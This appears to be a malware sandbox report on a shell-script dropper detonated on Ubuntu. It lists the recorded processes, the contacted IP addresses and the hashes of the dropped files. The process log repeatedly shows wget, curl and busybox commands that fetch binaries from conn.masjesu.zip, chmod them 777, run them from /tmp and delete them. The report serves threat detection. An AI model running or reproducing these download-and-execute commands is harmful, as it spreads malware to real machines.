[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-21 01:37

Reported

2024-10-21 01:39

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

148s

Max time network

132s

Command Line

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh

[/tmp/aa8303699498e8cc4fca3684190695fc46fb229a86912da86d278265ae85456b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.193.91:443 tcp
GB 195.181.164.14:443 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp

Files

N/A